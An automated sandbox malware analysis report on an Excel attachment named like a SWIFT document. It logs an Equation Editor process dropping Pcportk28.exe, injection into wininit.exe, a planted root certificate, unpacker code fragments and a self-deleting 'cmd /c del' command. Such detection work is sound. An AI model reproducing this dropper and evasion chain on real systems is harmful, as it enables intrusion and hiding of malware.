          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008FF8EE
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0086C85C
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0088286D
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0090098E
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008629B2
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008769FE
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008E394B
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008E5955
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00913A83
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0090CBA4
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008E6BCB
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0085FBD7
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008EDBDA
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00887B00
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008FFDDD
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025D1238
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0252E2E9
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02537353
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0257A37B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02532305
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025563DB
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0252F3CF
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025D63BF
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0254905A
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02533040
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0255D005
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0252E0C6
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0257A634
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025D2622
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0253E6C1
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02534680
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025657C3
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025B579A
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0253C7BC
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0256D47D
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025B443E
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02565485
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02541489
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02576540
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0253351F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0254C5F0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025E3A83
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02557B00
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025BDBDA
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0252FBD7
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025DCBA4
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0253C85C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0255286D
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025CF8EE
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025B5955
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025B394B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025469FE
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025D098E
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025329B2
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0254EE4C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02562E2F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0255DF7C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02540F3F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025A2FDC
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025CCFB1
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0253CD5B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02560D3B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025CFDDD
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FC948
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E8C80
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E2D8A
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E2D90
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E2FB0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 0259F970 appears 82 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 02573F92 appears 132 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 0257373B appears 245 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 0252E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 0252DF5C appears 119 times
          Source: C:\Users\Public\Pcportk28.exeCode function: String function: 0085E2A8 appears 36 times
          Source: C:\Users\Public\Pcportk28.exeCode function: String function: 008CF970 appears 78 times
          Source: C:\Users\Public\Pcportk28.exeCode function: String function: 008A373B appears 214 times
          Source: C:\Users\Public\Pcportk28.exeCode function: String function: 008A3F92 appears 110 times
          Source: C:\Users\Public\Pcportk28.exeCode function: String function: 0085DF5C appears 105 times
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_004185E0 NtCreateFile,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00418690 NtReadFile,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00418710 NtClose,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_004185DA NtCreateFile,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041870B NtClose,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008500C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00850048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00850078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008507AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008510D0 NtOpenProcessToken,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00850060 NtQuerySection,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008501D4 NtSetValueKey,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0085010C NtOpenDirectoryObject,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00851148 NtOpenThread,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00851930 NtSetContextThread,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084F938 NtWriteFile,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FAB8 NtQueryValueKey,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FA20 NtQueryInformationFile,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FB50 NtCreateKey,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FC30 NtOpenProcess,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00850C40 NtGetContextThread,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FC48 NtSetInformationFile,
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00851D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025200C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025207AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02520048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02520078 NtResumeThread,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02520060 NtQuerySection,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025210D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02521148 NtOpenThread,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0252010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025201D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02521930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02520C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02521D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000F85E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000F8690 NtReadFile,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000F8710 NtClose,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000F87C0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000F85DA NtCreateFile,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000F870B NtClose,
          Source: 7916.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msvbvm60.dll
          Source: C:\Users\Public\Pcportk28.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\Pcportk28.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Users\Public\Pcportk28.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\Pcportk28.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\wininit.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\wininit.exeMemory allocated: 76E90000 page execute and read and write
          Source: i4L[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Pcportk28.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
          Source: C:\Users\Public\Pcportk28.exeProcess created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe
          Source: C:\Windows\SysWOW64\wininit.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\Pcportk28.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
          Source: C:\Users\Public\Pcportk28.exeProcess created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
          Source: C:\Windows\SysWOW64\wininit.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\Pcportk28.exe"
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$SWIFT - Copy - Copy.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR379.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/6@6/5
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\Pcportk28.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\Pcportk28.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: SWIFT - Copy - Copy.xlsxStatic file information: File size 1400294 > 1048576
          Source: Binary string: wininit.pdb source: Pcportk28.exe, 00000005.00000002.519519469.0000000000479000.00000004.00000020.sdmp, Pcportk28.exe, 00000005.00000002.519453016.0000000000380000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000002.520658303.00000000009C0000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.484779384.0000000000550000.00000004.00000001.sdmp, Pcportk28.exe, 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.485865718.00000000006B0000.00000004.00000001.sdmp, wininit.exe
          Source: Binary string: ILi.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000000.483141980.00000000010E2000.00000020.00020000.sdmp
          Source: SWIFT - Copy - Copy.xlsxInitial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: i4L[1].exe.2.dr, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: Pcportk28.exe.2.dr, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.3.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.10.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.4.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.2.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.Pcportk28.exe.10e0000.5.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.6.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.8.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          .NET source code contains method to dynamically call methods (often used by packers)Show sources
          Source: i4L[1].exe.2.dr, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: Pcportk28.exe.2.dr, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 4.2.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 4.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.3.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.10.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.4.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.2.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.2.Pcportk28.exe.10e0000.5.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.6.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.8.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_010E9A2A push es; retf
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_010E9767 push 3A000004h; retf 0000h
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_010EA0FF push es; iretd
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041B822 push eax; ret
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041B82B push eax; ret
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041B88C push eax; ret
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_004153E0 push es; retf
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00415C4E push ebp; ret
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041CD74 push eax; ret
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00414EAF pushad ; ret
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041CF70 pushad ; ret
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041B7D5 push eax; ret
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_010EA0FF push es; iretd
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_010E9A2A push es; retf
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_010E9767 push 3A000004h; retf 0000h
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0252DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000F53E0 push es; retf
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FB7D5 push eax; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FB82B push eax; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FB822 push eax; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FB88C push eax; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000F5C4E push ebp; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FCD74 push eax; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000F4EAF pushad ; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FCF70 pushad ; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.09183457807
          Source: initial sampleStatic PE information: section name: .text entropy: 7.09183457807
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\Pcportk28.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\Pcportk28.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\Pcportk28.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
